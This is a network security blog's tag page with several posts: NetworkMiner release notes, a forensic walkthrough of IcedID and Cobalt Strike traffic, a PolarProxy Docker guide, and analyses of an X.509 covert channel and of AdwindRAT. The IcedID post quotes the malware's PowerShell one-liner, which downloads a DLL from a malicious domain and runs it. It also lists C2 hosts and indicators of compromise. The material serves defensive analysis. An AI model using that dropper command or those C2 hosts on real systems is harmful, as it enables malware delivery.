NETRESEC Network Security Blog - Tag : X.509

rss Google News

NetworkMiner 2.7.3 Released

NetworkMiner 2.7.3

NetworkMiner now extracts meterpreter payloads from reverse shells and performs offline lookups of JA3 hashes and TLS certificates. Our commercial tool, NetworkMiner Professional, additionally comes with a packet carver that extracts network packets from memory dumps.

Extraction of Meterpreter Payloads

NetworkMiner 2.7.3 supports extraction of meterpreter DLL payloads from reverse shell TCP sessions deployed with Metasploit. The free version of NetworkMiner will try to extract the meterpreter DLL from TCP sessions going to "poker-hand ports" commonly used for meterpreter sessions, such as 3333, 4444, 5555, etc. The port-independent protocol detection feature available in NetworkMiner Professional additionally enables extraction of meterpreter DLLs regardless which LPORT the attacker specifies when deploying the reverse shell.

Meterpreter DLL extracted from PCAP file in NetworkMiner Professional

Image: Meterpreter DLL extracted from DFIR Madness' case001.pcap

Packet Carving in NetworkMiner Professional

If you try to open anything other than a PCAP, PcapNG or ETL file in NetworkMiner Professional, then you'll be presented with an option to carve packets from the opened file as of this release.

NetworkMiner Unknown Capture File Format

The packet carver can extract packets from any structured or unstructured data, such as memory dumps and proprietary packet capture formats. NetworkMiner Pro's carver is a simplified version of the packet carving feature in CapLoader.

Loading the 1GB "memdump.mem" from Ali Hadi's Challenge #1 - Web Server Case into NetworkMiner Professional takes roughly five seconds, during which 612 packets get extracted.

NetworkMiner Professional with packets extracted from memory dump

Image: Information about network hosts carved from memory dump

In this scenario the memory was dumped on the 192.168.56.101 host, which NetworkMiner identifies as "WIN-L0ZZQ76PMUF". The carved packets also indicate that this computer had an outgoing TCP connection to 192.168.56.102, which appears to be a Linux machine called "kali". As you can see in the screenshot, the packets carved from the memory dump also reveal a great deal about other hosts on the network, such as the 192.168.56.1 host, which seems to be a Windows 7 machine called "IT104-00".

Offline Matching of JA3 and X.509 hashes

NetworkMiner 2.7.3 comes with a local copy of the SSL Certificate and JA3 Fingerprint Blacklists from the awesome abuse.ch project. JA3 hashes and extracted X.509 certificates are matched against these lists in order to see if they are associated with any piece of malware or botnet.

Here's one example showing the default Cobalt Strike certificate being identified as "AKBuilder C&C", since that's how it is listed in abuse.ch's SSL certificate database.

CobaltStrike default X.509 certificate

Image: Cobalt Strike's default certificate identified as "AKBuilder C&C"
PCAP: Cobalt Strike PCAP from malware-traffic-analysis.net

The port-independent protocol detection feature in NetworkMiner Professional additionally enables X.509 certificates to be extracted even from non-standard TLS ports, such as this certificate, which is identified as "BitRAT" with help of the abuse.ch certificate block-list.

NetworkMiner Professional with BitRAT TLS traffic

Image: Both X.509 certificate and JA3 hash identified as BitRAT
PCAP: BitRAT PCAP from Joe Sandbox

The client's JA3 hash 8515076cbbca9dce33151b798f782456 is also associated with BitRAT according to abuse.ch.

DBSBL Lookup Detection

DNSBL services are used by servers handling incoming email to verify that the sender's IP address isn't a known SPAM sender and that it isn't from a network that shouldn't be sending emails.

But DNSBL services can also be used by malware and botnets, such as TrickBot and Emotet, to verify that the public IP of a victim is allowed to send emails and that it hasn't already been blacklisted for sending SPAM. We have therefore decided to add DNSBL lookups to the Host Details section in NetworkMiner 2.7.3.

DNSBL lookups in NetworkMiner

Image: TrickBot victim checks if its public IP is blocked by DNSBL services
PCAP: TrickBot PCAP from malware-traffic-analysis.net

DNSBL lookups are also logged to the "Parameters" tab of NetworkMiner.

NetworkMiner with DNSBL parameters

Image: NetworkMiner's Parameters tab with "DNSBL" filter
PCAP: TrickBot PCAP from malware-traffic-analysis.net

Additional Features and Updates

We'd also like to mention some additional new features, bug fixes and improvements that have been included in this new release.

  • Support for HTTP CONNECT request method to extract artifacts like X.509 certificates and JA3 hashes from HTTPS traffic passing through a web proxy.
  • Traffic to TCP ports 3000 and 8000 are now configured to be parsed as HTTP by default in order to handle WEBrick traffic.
  • Improved extraction of SMTP credentials.
  • JA3 hashes were previously incorrect for clients that supported more than one EC point format (RFC 8422). This has now been fixed.
  • Support for SLL2 (Linux cooked capture v2) frames.
  • Improved handling of concurrent GUI events, for example when poking around in the "Hosts" tab while loading a PCAP file or doing live sniffing.
  • NetworkMiner's GUI no longer reloads between each PCAP file when multiple files are loaded at once.

New Features in NetworkMiner Professional

We have also added a few new features exclusively to NetworkMiner Professional, which is the commercial version of NetworkMiner. Apart from the packet carver feature, mentioned earlier in this blog post, we've also updated the collection of OSINT lookup services available in the GUI. One of the newly added services is Ryan Benson's unfurl, which picks apart URLs to reveal data that might have been encoded into a complex URL. The unfurl lookup can be found by right-clicking an URL in NetworkMiner Professional's "Browsers" tab and selecting the "Lookup URL" sub menu.

Other OSINT services that we've added are FileScan.IO and JoeSandbox lookups of extracted files. These lookups can be performed by right clicking a file in the "Files" tab and opening the sub-menu called "Lookup Hash".

Lookup of file hash on JoeSandbox

Image: OSINT lookup of an EXE file extracted from network traffic

The command-line version of NetworkMiner Professional, NetworkMinerCLI, has also been updated to allow extracted information to be printed directly on standard output instead of logging everything to files. Here is an example showing this feature while running NetworkMinerCLI in Linux (with help of Mono):

mono /opt/NetworkMinerProfessional_2-7-3/NetworkMinerCLI.exe -r 2022-03-14-Qakbot-with-Cobalt-Strike-and-VNC-module.pcap -w /tmp/malware -X FileInfos | cut -d, -f 5,9
"s2Fmok83x.zip.html","ba2ef33c7aef593f95d261b6f4406b39"
"nexus.officeapps.live.com.cer","373ccffe30d3477867642abab723a351"
"Microsoft RSA TLS CA 01.cer","806f1c72f6d67c9c114eff43d3d84100"
"nexusrules.officeapps.live.c.cer","4c08442740cb020d457a5df16be406ff"
"Microsoft RSA TLS CA 02.cer","65d17ecae5798c79db8e840fe98a53b9"
"6537991.dat.exe","124207bc9c64e20e114bcaeabde12a4e"
"6537991.dat.exe","ca7ef367c935182a40a95b9ad8b95f42"
"6537991.dat.exe","a9a8366fa6be54b45ca04192ca217b75"
[...]

The command above extracts files from a PCAP file, which contains traffic from a Windows PC infected with Qbot. The "-w" switch specifies the output directory for the files extracted from network traffic, and the "-X FileInfos" specifies that metadata for these files should be sent to STDOUT instead of being written to log files. The cut utility was used to show only the filename (column 5) and MD5 hash (column 9) of the file info output.

The MD5 hashes of the extracted files confirm that this is indeed a Qbot infection:

  • 124207bc9c64e20e114bcaeabde12a4e (VT)
  • ca7ef367c935182a40a95b9ad8b95f42 (VT)
  • a9a8366fa6be54b45ca04192ca217b75 (VT)

NetworkMinerCLI previously printed some information about the parsing process to STDOUT. That output has now been moved to STDERR in order to provide the "-X [type]" output with exclusive access to STDOUT.

Credits

We'd like to thank Michael Taggart for noticing that NetworkMiner previously failed to parse HTTP traffic to ports 3000 and 8000.

Upgrading to Version 2.7.3

Users who have purchased NetworkMiner Professional can download a free update to version 2.7.3 from our customer portal, or use the “Help > Check for Updates” feature. Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Posted by Erik Hjelmvik on Monday, 04 April 2022 06:52:00 (UTC/GMT)

Tags: #NetworkMiner#carve#JA3#X.509#CobaltStrike#Cobalt Strike#TrickBot#Emotet#PIPI#Protocol Detection#OSINT#NetworkMinerCLI

Short URL: https://netresec.com/?b=22479d5


Analysing a malware PCAP with IcedID and Cobalt Strike traffic

IdedID and Cobalt Strike

This network forensics walkthrough is based on two pcap files released by Brad Duncan on malware-traffic-analysis.net. The traffic was generated by executing a malicious JS file called StolenImages_Evidence.js in a sandbox environment.

The capture file starts with a DNS lookup for banusdona.top, which resolved to 172.67.188.12, followed by an HTTP GET request for "/222g100/index.php" on that domain. The following PowerShell oneliner is returned in the HTTP response from banusdona.top:

$path = $Env:temp+'\JwWdx.dat'; $client = New-Object Net.WebClient; $client.downloadfile('http://banusdona.top/222g100/main.php',$path); C:\Windows\System32\rundll32.exe $path,DllRegisterServer

This oneliner instructs the initial dropper to download a Win32 DLL payload from http://banusdona[.]top/222g100/main.php and save it as "JwWdx.dat" in the user's temp directory and then run the DLL with:

rundll32.exe %TEMP%\JwWdx.dat,DllRegisterServer

As you can see in the screenshot below, the HTTP response for this second request to banusdona.top has Content-Type "application/octet-stream", but also a conflicting Content-disposition header of "attachment;filename=data.jpg", which indicates that the file should be saved to disk as "data.jpg". Nevertheless, the "MZ" header in the transferred data reveals that the downloaded data wasn't an image, but a Windows binary (dll or exe).

CapLoader transcript of IcedID malware download Image: CapLoader transcript of IcedID malware download

The downloaded file gets extracted from the pcap file by NetworkMiner as "data.jpg.octet-stream".

Files extracted from PCAP by NetworkMiner Image: Files extracted from PCAP by NetworkMiner

Right-clicking "data.jpg.octet-stream" in NetworkMiner and selecting "Calculate MD5..." brings up a new window with additional file details, such as MD5 and SHA hashes of the reassembled file.

Extracted malware download of Cerbu / IcedID f98711dfeeab9c8b4975b2f9a88d8fea
MD5: f98711dfeeab9c8b4975b2f9a88d8fea SHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb SHA256: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c

This file is available on VirusTotal, where we can see that it's a DLL that several AV vendors identify as "Cerbu" or "IcedID". VirusTotal's C2AE sandbox analysis of the DLL also reveals the domain name "momenturede.fun" in the process' memory. As you might expect, a connection is made to that domain just a few seconds later. A nice overview of these connections can be seen in CapLoader's Flow tab.

CapLoader showing initial flows from the IcedID malware execution Image: CapLoader showing initial flows from the IcedID malware execution

The momenturede.fun server returns a 500kB file, which NetworkMiner extracts from the pcap file as "index.gzip".

MD5: 96a535122aba4240e2c6370d0c9a09d3 SHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8 SHA256: 3d1b525ec2ee887bbc387654f6ff6d88e41540b789ea124ce51fb5565e2b8830

This turns out to be an encrypted IcedID DLL file, which has been analyzed by Ali Aqeel here:
https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/

Right after the IcedID download we see a series of HTTPS connections towards odd domains like vaccnavalcod.website, mazzappa.fun, ameripermanentno.website and odichaly.space, all of which resolved to IP 83.97.20.176. That host is most likely a command-and-control (C2) server used by the IcedID malware.

CapLoader's "Services" tab also reveals that the TLS connections to port 443 on 83.97.20.176 are very periodic, with a new connection every 5 minutes. Periodic connection patterns like this is a typical indicator of C2 traffic, where the malware agent connects back to the C2 server on regular intervals to check for new tasks.

Periodic IcedID C2 communication detected by CapLoader Image: CapLoader's Services tab showing that the IcedID malware agent connects to the C2 server every 5 minutes (00:05:01).

The traffic to 83.97.20.176 is encrypted, so we can't inspect the payload to verify whether or not it is IcedID C2 communications. What we can do, however, is to extract the HTTPS server's X.509 certificate and the JA3 hash of the client's TLS implementation from the encrypted traffic.

NetworkMiner has extracted the X.509 certificates for vaccnavalcod.website, mazzappa.fun, ameripermanentno.website and odichaly.space to disk as "localhost.cer".

X.509 certificate 452e969c51882628dac65e38aff0f8e5ebee6e6b

It turns out that all these sites used the same self-signed certificate, which had SHA1 fingerprint 452e969c51882628dac65e38aff0f8e5ebee6e6b. The X.509 certificate was created using OpenSSL's default values, such as "Internet Widgits Pty Ltd" etc. Further details about this certificate can be found on censys.io.

The JA3 hashes used by the IcedID malware agent can be found in NetworkMiner's Hosts tab as well as in the Parameters tab.

NetworkMiner's Parameters tab with keyoword filter JA3 Hash Image: NetworkMiner's Parameters tab with keyword filter "JA3 Hash"

The JA3 hashes for the client that connects to the C2 server are a0e9f5d64349fb13191bc781f81f42e1 and 3b5074b1b5d032e5620f69f9f700ff0e. Several legitimate Windows applications unfortunately have the same JA3 hashes, so we can't use them to uniquely identify the IcedID agents.

The IcedID C2 traffic continues for over 19 hours, at which point we suddenly see a connection to a new suspicious domain called "lesti.net" on 185.141.26.140. The first HTTP request to that domain is used to download a 261703 byte file, as can be seen in this Flow Transcript from CapLoader:

CapLoder Transcript of CobaltStrike beacon download

NetworkMiner extracts this file as "9r8z.octet-stream". This turns out to be a Cobalt Strike beacon download, which we can decode with Didier Stevens' fantastic 1768.py script.

The output from 1768.py reveals that this Cobalt Strike beacon is using the following URIs for C2 communication:

  • GET URI: http://lesti[.]net/userid=
  • POST URI: http://lesti[.]net/update.php

We can also see that the Cobalt Strike license-id (a.k.a. watermark) is 1580103814. This ID can be used to link this Cobalt Strike beacon to other campaigns. Below is a list of Cobalt Strike C2 servers using license-id 1580103814 discovered by Tek in December 2020:

  • 45.147.229[.]157
  • selfspin[.]com
  • savann[.]org
  • palside[.]com
  • server3.msadwindows[.]com
  • mapizzamates[.]com
  • fixval[.]com
  • rackspare-technology[.]download
  • 108.177.235[.]148
  • matesmapizza[.]com

Update 4 May 2021

Sergiu Sechel published a blog post yesterday, which included a list of Cobalt Strike C2 servers. We fed this list to Tek's scan_list.py script in order to see if license-id 1580103814 is still active. It turned out it was. We found the following 27 domains and IP's running Cobalt Strike C2 servers on TCP 443 using that license-id.

  • 151.236.14[.]53
  • 151.236.14[.]53
  • 172.241.27[.]70
  • 193.29.13[.]201
  • 193.29.13[.]201
  • 193.29.13[.]209
  • 194.165.16[.]60
  • 193.29.13[.]209
  • 193.29.13[.]201
  • 194.165.16[.]60
  • 194.165.16[.]60
  • dain22[.]net
  • drellio[.]com
  • feusa[.]net
  • fut1[.]net
  • helle1[.]net
  • hars2t[.]com
  • kasaa[.]net
  • idxup[.]com
  • maren2[.]com
  • mgfee[.]com
  • massflip[.]com
  • oaelf[.]com
  • repdot[.]com
  • scalewa[.]com
  • tulls[.]net
  • wellser[.]org

The full output from our re-scan of Sergiu's C2 list can be found on pastebin.

Update 8 May 2021

Security researcher Michael Koczwara is tracking Cobalt Strike license 1580103814 as APT actor LuckyMouse (a.k.a. Emissary Panda or APT 27). Michael's Cobalt Stike C2 dataset, which currently contains 25 unique C2 IPs and domains for license-id 1580103814, is available as a Google Docs spreadsheet (see the "LuckyMouse Actor" tab).

Indicators of Compromise - IOCs

  • MD5: 8da75e1f974d1011c91ed3110a4ded38
  • SHA1: e9b5e549363fa9fcb362b606b75d131dec6c020e
  • SHA256: 0314b8cd45b636f38d07032dc8ed463295710460ea7a4e214c1de7b0e817aab6
  • DNS: banusdona.top
  • IP: 172.67.188.12
  • MD5: f98711dfeeab9c8b4975b2f9a88d8fea
  • SHA1: c2bdc885083696b877ab6f0e05a9d968fd7cc2bb
  • SHA256: 213e9c8bf7f6d0113193f785cb407f0e8900ba75b9131475796445c11f3ff37c
  • DNS: momenturede.fun
  • IP: 104.236.115.181
  • MD5: 96a535122aba4240e2c6370d0c9a09d3
  • SHA1: 485ba347cf898e34a7455e0fd36b0bcf8b03ffd8
  • MD5: 11965662e146d97d3fa3288e119aefb2
  • SHA1: b63d7ad26df026f6cca07eae14bb10a0ddb77f41
  • SHA256: d45b3f9d93171c29a51f9c8011cd61aa44fcb474d59a0b68181bb690dbbf2ef5
  • DNS: vaccnavalcod.website
  • DNS: mazzappa.fun
  • DNS: ameripermanentno.website
  • DNS: odichaly.space
  • IP: 83.97.20.176
  • SHA1: 452e969c51882628dac65e38aff0f8e5ebee6e6b
  • DNS: lesti.net
  • IP: 185.141.26.140
  • MD5: 449c1967d1708d7056053bedb9e45781
  • SHA1: 1ab39f1c8fb3f2af47b877cafda4ee09374d7bd3
  • SHA256: c7da494880130cdb52bd75dae1556a78f2298a8cc9a2e75ece8a57ca290880d3
  • Cobalt Strike Watermark: 1580103814

Network Forensics Training

Are you interested in learning more about how to analyze captured network traffic from malware and hackers? Have a look at our network forensic trainings. Our next class is a live online event called PCAP in the Morning.

Posted by Erik Hjelmvik on Monday, 19 April 2021 09:45:00 (UTC/GMT)

Tags: #Cobalt Strike#CobaltStrike#IcedID#NetworkMiner#CapLoader#Network Forensics#JA3#X.509#1768.py#a0e9f5d64349fb13191bc781f81f42e1

Short URL: https://netresec.com/?b=214d7ff


PolarProxy in Docker

PolarProxy + Docker

Our transparent TLS proxy PolarProxy is gaining lots of popularity due to how effective it is at generating decrypted PCAP files in combination with how easy it is to deploy. In this blog post we will show how to run PolarProxy in Docker.

Installation Instructions

Create a Dockerfile with the following contents:

FROM mcr.microsoft.com/dotnet/runtime:6.0
EXPOSE 10443
EXPOSE 10080
EXPOSE 57012
RUN groupadd -g 31337 polarproxy && useradd -m -u 31337 -g polarproxy polarproxy && mkdir -p /var/log/PolarProxy /opt/polarproxy && chown polarproxy:polarproxy /var/log/PolarProxy && apt-get update && apt-get install -y curl && curl -s https://www.netresec.com/?download=PolarProxy | tar -xzf - -C /opt/polarproxy
VOLUME ["/var/log/PolarProxy/", "/home/polarproxy/"]
USER polarproxy
WORKDIR /opt/polarproxy/
ENTRYPOINT ["dotnet", "PolarProxy.dll"]
CMD ["-v", "-p", "10443,80,443", "-o", "/var/log/PolarProxy/", "--certhttp", "10080", "--pcapoverip", "0.0.0.0:57012"]

Save the Docker file as "Dockerfile" (no extension) in an empty directory and start a shell in that directory with root privileges.


Update (2024-05-02): Additional dockerfiles can now be found in https://github.com/Netresec/PolarProxy/tree/main/dockerfiles

Build the PolarProxy Docker image with:

docker build -t polarproxy-image .

Next, create a Docker container named "polarproxy":

docker create -p 443:10443 -p 10443:10443 -p 10080:10080 --name polarproxy polarproxy-image
The "-p" switches in this command define three DNAT rules that will get activated when the polarproxy container is started. The first DNAT rule forwards incoming TCP port 443 traffic to the polarproxy Docker container's transparent TLS proxy service on TCP port 10443. The second one does the same thing, but for incoming traffic to TCP 10443. The last one forwards TCP port 10080 traffic to a web server that delivers the public X.509 certificate of the proxy.

It is now time to start the polarproxy container:

docker start polarproxy

Verify that PolarProxy is running:

docker ps
docker logs polarproxy

Try fetching PolarProxy's public root CA certificate with curl and then connect to a website over HTTPS through the proxy:

curl -sL http://localhost:10080 | openssl x509 -inform DER -issuer -noout -dates
curl --insecure --connect-to www.netresec.com:443:127.0.0.1:10443 https://www.netresec.com/
curl --insecure --resolve www.netresec.com:443:127.0.0.1 https://www.netresec.com/

Redirect HTTPS and Trust the Root CA

You can now redirect outgoing TCP 443 traffic from your network to your Docker host. Review the "Routing HTTPS Traffic to the Proxy" section on the PolarProxy page for recommendations on how to redirect outgoing traffic to PolarProxy.

Finally, configure the operating system, browsers and other applications that will get their TLS traffic proxied by PolarProxy to trust the root CA of the PolarProxy service running in your Docker container. Follow the steps in the "Trusting the PolarProxy root CA" section of the PolarProxy documentation in order to install the root cert.

Docker Volumes

The Docker file we used in this blog post defines two volumes. The first volume is mounted on "/var/log/PolarProxy" in the container, which is where the decrypted network traffic will be stored as hourly rotated PCAP files. The second volume is the polarproxy home directory, under which PolarProxy will store its private root CA certificate.

The volumes are typically located under "/var/lib/docker/volumes" on the Docker host's file system. You can find the exact path by running:

docker volume ls
docker volume inspect <VOLUME_NAME>

Or use find to list *.pcap files in the Docker volumes directory:

find /var/lib/docker/volumes/ -name *.pcap
/var/lib/docker/volumes/7ebb3f56fd4ceab96[...]/_data/​proxy-201006-095937.pcap/var/lib/docker/volumes/7ebb3f56fd4ceab96[...]/_data/​proxy-201006-105937.pcap/var/lib/docker/volumes/7ebb3f56fd4ceab96[...]/_data/​proxy-201006-115937.pcap

The full path of your private PolarProxy Root CA certificate, which is located under "/home/polarproxy/" in the Docker container, can also be located using find:

find /var/lib/docker/volumes/ -name *.p12
/var/lib/docker/volumes/dcabbbac10e1b1461[...]/_data/​.local/share/PolarProxy/​e249f9c497d7b5c41339f153a31eda1c.p12

We recommend reusing the "/home/polarproxy/" volume, when deploying new PolarProxy instances or upgrading to a new version of PolarProxy, in order to avoid having to re-configure clients to trust a new root CA every time a new PolarProxy container is created.

PolarProxy in Docker on ARM Linux

PolarProxy can also run on ARM Linux installations, such as a Raspberry Pi. However, the Dockerfile must be modified slightly in order to do so.

ARM 32-bit / AArch32 / ARMv7 If you're running an "arm32" Linux OS, then change the download link in the "RUN" instruction to the following URL:
https://www.netresec.com/?download=PolarProxy_linux-arm

ARM 64-bit / AArch64 / ARMv8 If you're running an "arm64" Linux OS, then change the download link in the "RUN" instruction to the following URL:
https://www.netresec.com/?download=PolarProxy_linux-arm64

Don't know if you're running a 32-bit or 64-bit OS? Run "uname -m" and check if the output says "armv7*" (arm32), "armv8*" (arm64) or "aarch64" (arm64).

See our blog post "Raspberry PI WiFi Access Point with TLS Inspection" for more details about deploying PolarProxy on a Raspberry Pi (without Docker).

Credits

We'd like to thank Jonas Lejon for contacting us back in February about the work he had done to get PolarProxy running in Docker. We used Jonas' work as a starting point when building the installation instructions in this how-to guide.

We also want to thank Erik Ahlström for providing valuable feedback on the instructions in this guide.

ʕ•ᴥ•ʔ + 🐳 = 💜

Posted by Erik Hjelmvik on Wednesday, 07 October 2020 08:09:00 (UTC/GMT)

Tags: #PolarProxy#Docker#TLS#HTTPS#Proxy#TLSI#Dockerfile#curl#x509#X.509#PCAP#DNAT#container#DNAT#arm32#arm64#AArch64#PCAP-over-IP#pcapoverip

Short URL: https://netresec.com/?b=20Accbd


Examining an x509 Covert Channel

Jason Reaves gave a talk titled “Malware C2 over x509 certificate exchange” at BSides Springfield 2017, where he demonstrated that the SSL handshake can be abused by malware as a covert command-and-control (C2) channel.

Jason Reaves presenting at BSides Springfield 2017

He got the idea while analyzing the Vawtrak malware after discovering that it read multiple fields in the X.509 certificate provided by the server before proceeding. Jason initially thought these fields were used as a C2 channel, but then realized that Vawtrak performed a variant of certificate pinning in order to discover SSL man-in-the-middle attempts.

Nevertheless, Jason decided to actually implement a proof-of-concept (PoC) that uses the X.509 certificate as a C2 channel. Jason’s code is now available on GitHub along with a PCAP file demonstrating this covert C2 channel. Of course I couldn’t resist having a little look at this PCAP file in NetworkMiner.

The first thing I noticed was that the proof-of-concept PCAP ran the SSL session on TCP 4433, which prevented NetworkMiner from parsing the traffic as SSL. However, I was able to parse the SSL traffic with NetworkMiner Professional just fine thanks to the port-independent-protocol-identification feature (a.k.a Dynamic Port Detection), which made the Pro-version parse TCP 4433 as SSL/TLS.

X.509 certificates extracted from PCAP with NetworkMiner
Image: X.509 certificates extracted from PCAP with NetworkMiner

A “normal” x509 certificate size is usually around 1kB, so certificates that are 11kB should be considered as anomalies. Also, opening one of these .cer files reveals an extremely large value in the Subject Key Identifier field.

X.509 certificate with MZ header in the Subject Key Identifier field

Not only is this field very large, it also starts with the familiar “4D 5A” MZ header sequence.

NetworkMiner additionally parses details from the certificates that it extracts from PCAP files, so the Subject Key Identifier field is actually accessible from within NetworkMiner, as shown in the screenshot below.

Parameters tab in NetworkMiner showing X.509 certificate details

You can also see that NetworkMiner validates the certificate using the local trusted root certificates. Not surprisingly, this certificates is not trusted (certificate valid = FALSE). It would be most unlikely that anyone would manage to include arbitrary data like this in a signed certificate.


Extracting the MZ Binary from the Covert X.509 Channel

Even though NetworkMiner excels at pulling out files from PCAPs, this is definitively an occasion where manual handling is required. Jason’s PoC implementation actually uses a whopping 79 individual certificates in order to transfer this Mimikatz binary, which is 785 kB.

Here’s a tshark oneliner you can use to extract the Mimikatz binary from Jason's example PCAP file.

tshark -r mimikatz_sent.pcap -Y 'ssl.handshake.certificate_length gt 2000' -T fields -e x509ce.SubjectKeyIdentifier -d tcp.port==4433,ssl | tr -d ':\n' | xxd -r -p > mimikatz.exe

Detecting x509 Anomalies

Even though covert channels using x509 certificates isn’t a “thing” (yet?) it’s still a good idea to think about how this type of covert signaling can be detected. Just looking for large Subject Key Identifier fields is probably too specific, since there are other fields and extensions in X.509 that could also be used to transmit data. A better approach would be to alert on certificates larger than, let’s say, 3kB. Multiple certificates can also be chained together in a single TLS handshake certificate record, so it would also make sense to look for handshake records larger than 8kB (rough estimate).

Bro IDS logo

This type of anomaly-centric intrusion detection is typically best done using the Bro IDS, which provides easy programmatic access to the X.509 certificate and SSL handshake.

There will be false positives when alerting on large certificates in this manner, which is why I recommend to also check if the certificates have been signed by a trusted root or not. A certificate that is signed by a trusted root is very unlikely to contain malicious data.

Posted by Erik Hjelmvik on Tuesday, 06 February 2018 12:13:00 (UTC/GMT)

Tags: #malware#C2#SSL#TLS#certificate#NetworkMiner#PCAP#x509#X.509#PIPI#Bro#IDS#tshark

Short URL: https://netresec.com/?b=182e662


Hunting AdwindRAT with SSL Heuristics

An increasing number of malware families employ SSL/TLS encryption in order to evade detection by Network Intrusion Detection Systems (NIDS). In this blog post I’m gonna have a look at Adwind, which is a cross-platform Remote Access Trojan (RAT) that has been using SSL to conceal it’s traffic for several years. AdwindRAT typically connects SSL sessions to seemingly random TCP ports on the C2 servers. Hence, a heuristic that could potentially be used to hunt for Adwind RAT malware is to look for SSL traffic going to TCP ports that normally don’t use SSL. However, relying on ONLY that heuristic would generate way too many false positives.

Brad Duncan did an interesting writeup about Adwind RAT back in 2015, where he wrote:

I saw the same certificate information used last week, and it continues this week.
  • commonName = assylias
  • organizationName = assylias.Inc
  • countryName = FR
Currently, this may be the best way to identify Adwind-based post-infection traffic. Look for SSL traffic on a non-standard TCP port using that particular certificate.

Unfortunately, Adwind RAT has evolved to use other CN’s in their new certificates, so looking for “assylias.Inc” will not cut it anymore. However, looking for SSL traffic on non-standard TCP ports still holds on the latest Adwind RAT samples that we’ve analyzed.

The PT Research Attack Detection Team (ADT) sent an email with IDS signatures for detecting AdwindRAT to the Emerging-Sigs mailing list a few days ago, where they wrote:

“We offer one of the ways to detect malicious AdwindRAT software inside the encrypted traffic. Recently, the detection of this malicious program in network traffic is significantly reduced due to encryption. As a result of the research, a stable structure of data fragments was created.”

Not only is it awesome that they were able to detect static patterns in the encrypted data, they also provided 25 PCAP files containing AdwindRAT traffic. I loaded these PCAP files into NetworkMiner Professional in order to have a look at the X.509 certificates. NetworkMiner Professional supports Port-Independent Protocol Identification (PIPI), which means that it will automatically identify the C2 sessions as SSL, regardless of which port that is used. It will also automatically extract the X.509 certificates along with any other parameters that can be extracted from the SSL handshake before the session goes encrypted.

X.509 certificates extracted from AdwindRAT PCAP by NetworkMiner Image: Files extracted from ADT’s PCAP files that mach “Oracle” and “cer”.

In this recent campaign the attackers used X.509 certificates claiming to be from Oracle. The majory of the extracted certificates were exactly 1237 bytes long, so maybe they’re all identical? This is what the first extracted X.509 certificate looks like:

Self-signed Oracle America, Inc. X.509 certificate

The cert claims to be valid for a whopping 100 years!

Self-signed Oracle America, Inc. X.509 certificate

Self-signed, not trusted.

However, after opening a few of the other certificates it's clear that each C2 server is using a unique X.509 certificate. This can be quickly confirmed by opening the parameters tab in NetworkMiner Pro and showing only the Certificate Hash or Subject Key Identifier values.

NetworkMiner Parameters tab showing Certificate Hash values Image: Certificate Hash values found in Adwind RAT’s SSL traffic

I also noted that the CN of the certificates isn’t constant either; these samples use CN’s such as “Oracle America”, “Oracle Tanzania”, “Oracle Arusha Inc.”, “Oracle Leonardo” and “Oracle Heaven”.

The CN field is normally used to specify which domain(s) the certificate is valid for, together with any additinoal Subject Alternative Name field. However, Adwind RAT’s certificates don’t contain any domain name in the CN field and they don’t have an Alternative Name record. This might very well change in future versions of this piece of malware though, but I don’t expect the malware authors to generate a certificate with a CN matching the domain name used by each C2 server. I can therefore use this assumption in order to better hunt for Adwind RAT traffic.

But how do I know what public domain name the C2 server has? One solution is to use passive DNS, i.e. to capture all DNS traffic in order to do passive lookups locally. Another solution is to leverage the fact that the Adwind RAT clients use the Server Name Indication (SNI) when connecting to the C2 servers.

TLS Server Name (aka SNI) and Subject CN values don’t match for AdwindRAT Image: TLS Server Name (aka SNI) and Subject CN values don’t match for AdwindRAT

TLS Server Name (SNI) with matching Subject CN from Google Image: TLS Server Name (SNI) with matching Subject CN from Google.

My conclusion is therefore that Brad’s recommendations from 2015 are still pretty okay, even for the latest wave of Adwind RAT traffic. However, instead of looking for a fix CN string I’d prefer to use the following heuristics to hunt for this type of C2 traffic:

  • SSL traffic to non-standard SSL port
  • Self signed X.509 certificate
  • The SNI domain name in the Client Hello message does not match the CN or Subject Alternative Name of the certificate.

These heuristics will match more than just Adwind RAT traffic though. You’ll find that the exact same heuristics will also help identify other pieces of SSL-enabled malware as well as Tor traffic.

Posted by Erik Hjelmvik on Monday, 04 September 2017 19:01:00 (UTC/GMT)

Tags: #NetworkMiner#SSL#TLS#port#PCAP#PIPI#X.509#certificate#extract

Short URL: https://netresec.com/?b=1798dc3


NetworkMiner 2.1 Released

NetworkMiner 2.1 Logo

We are releasing a new version of NetworkMiner today. The latest and greatest version of NetworkMiner is now 2.1.

Yay! /throws confetti in the air


Better Email Parsing

I have spent some time during 2016 talking to digital forensics experts at various law enforcement agencies. I learned that from time to time criminals still fail to use encryption when reading their email. This new release of NetworkMiner therefore comes with parsers for POP3 and IMAP as well as an improved SMTP parser. These are the de facto protocols used for sending and receiving emails, and have been so since way back in the 90’s.

Messages tab in NetworkMiner 2.1 showing extracted emails
Messages tab in NetworkMiner 2.1 showing extracted emails

Not only does NetworkMiner show the contents of emails within the tool, it also extracts all attachments to disk and even saves each email as an .eml file that can be opened in an external email reader in order to view it as the suspect would.

Extracted email Get_free_s.eml opened in Mozilla Thunderbird
Extracted email ”Get_free_s.eml” opened in Mozilla Thunderbird

Encapsulation Protocols

There are several protocols that can be used to provide logical separation of network traffic, in order to avoid using multiple physical networks to keep various network segments, security domains or users apart. Some of these techniques for logical separation rely on tagging or labeling, while others are tunneling the encapsulated traffic. Nevertheless, it’s all pretty much the same thing; an encapsulation protocol is used in order to wrap protocol X inside protocol Y, usually while adding some metadata in the process.

NetworkMiner has been able to parse the classic encapsulation protocols 802.1Q, GRE and PPPoE since 2011, but we now see an increased use of protocols that provide logical separation for virtualization and cloud computing environments. We have therefore added parsers in NetworkMiner 2.1 for VXLAN and OpenFlow, which are the two most widely used protocols for logical separation of traffic in virtualized environments. We have also added decapsulation of MPLS and EoMPLS (Ethernet-over-MPLS) to NetworkMiner 2.1.

Encapsulation examples for MPLS GRE and VXLAN

